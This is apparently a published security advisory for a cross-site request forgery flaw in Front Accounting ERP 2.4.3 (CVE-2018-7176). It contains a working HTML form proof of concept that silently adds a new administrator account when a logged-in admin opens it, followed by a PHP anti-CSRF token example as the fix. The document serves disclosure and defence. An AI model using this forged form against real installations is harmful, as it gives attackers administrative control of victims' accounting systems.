<!--
# Exploit Title: Front Accounting ERP 2.4.3 - CSRF
# Date: 16-02-2018
# Exploit Author: Samrat Das
# Contact: http://twitter.com/Samrat_Das93
# Website: https://securitywarrior9.blogspot.in/
# Vendor Homepage: frontaccounting.com
# Version: 2.4.3
# CVE : CVE-2018-7176
# Category: WebApp ERP

1. Description

The application's state-changing requests carry no anti-CSRF countermeasures, so a crafted HTML page hosted elsewhere is executed directly against the application in the context of the logged-in user.

2. Proof of Concept

1. Visit the application.
2. Visit the User Permissions page.
3. Go to "Add user" and build a CSRF page for that request. Hosted on a server and sent to the victim as a link to click, it is exploited once the victim opens it.

Steps to Reproduce:

1. Create an HTML page with the exploit code below:
-->
<html>
<body>
<form action="http://localhost/frontaccounting/admin/users.php?JsHttpRequest=0-xml" method="POST" enctype="text/plain">
<input type="hidden" name="show_inactive" value="&user_id=Newadmin&password=Newadmin&real_name=New%20Admin&phone=&email=&role_id=8&language=C&pos=1&print_profile=&rep_popup=1&ADD_ITEM=Add%20new&_focus=user_id&_modified=0&_confirmed=&_token=Ta6aiT2xqlL2vg8u9aAvagxx&_random=757897.6552143205" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<!--
2. When a logged-in admin user opens this hosted page and clicks the button, a new malicious admin user is created.

3. PoC and steps:
https://securitywarrior9.blogspot.in/2018/02/cross-site-request-forgery-front.html

4. Solution:

Implement anti-CSRF tokens in state-changing HTTP requests and validate them on the server side.
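The fix described above, as an added PHP example (not FrontAccounting's own code): a synchronizer-token check to call at the top of a state-changing handler such as admin/users.php. The session key, field name and function names are assumptions; the PoC request above carries a `_token` parameter and still succeeds, so the token must be compared against a secret stored in the victim's session rather than merely required to be present.

```php
<?php
// Added example, not FrontAccounting code. Synchronizer-token CSRF check for
// state-changing handlers. Assumes session_start() has already run.
// Session key, field name and function names below are assumptions.

const CSRF_SESSION_KEY = '_csrf_token';
const CSRF_FORM_FIELD  = '_token';

// Return the per-session secret, generating it on first use.
function csrf_token(): string
{
    if (empty($_SESSION[CSRF_SESSION_KEY])) {
        $_SESSION[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $_SESSION[CSRF_SESSION_KEY];
}

// Hidden field to embed in every state-changing form the app renders.
function csrf_field(): string
{
    $value = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="' . CSRF_FORM_FIELD . '" value="' . $value . '">';
}

// Compare the submitted token with the session copy in constant time.
// A page on another origin cannot read the victim's session token, so a
// forged form fails here even if it sends a fixed _token value.
function csrf_validate(array $post, array $session): bool
{
    $expected = $session[CSRF_SESSION_KEY] ?? '';
    $given    = $post[CSRF_FORM_FIELD] ?? '';
    if (!is_string($given) || $expected === '' || $given === '') {
        return false;
    }
    return hash_equals($expected, $given);
}

// Call before any write in a handler: state changes require POST plus a
// valid token; anything else is rejected without touching the database.
function csrf_guard(): void
{
    if ($_SERVER['REQUEST_METHOD'] !== 'POST' || !csrf_validate($_POST, $_SESSION)) {
        http_response_code(403);
        exit('Rejected: missing or invalid CSRF token');
    }
}
```

If a handler parses the request body itself instead of reading $_POST (the PoC submits with enctype="text/plain"), pass that parsed array to csrf_validate() so the check covers the input the handler actually acts on.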
-->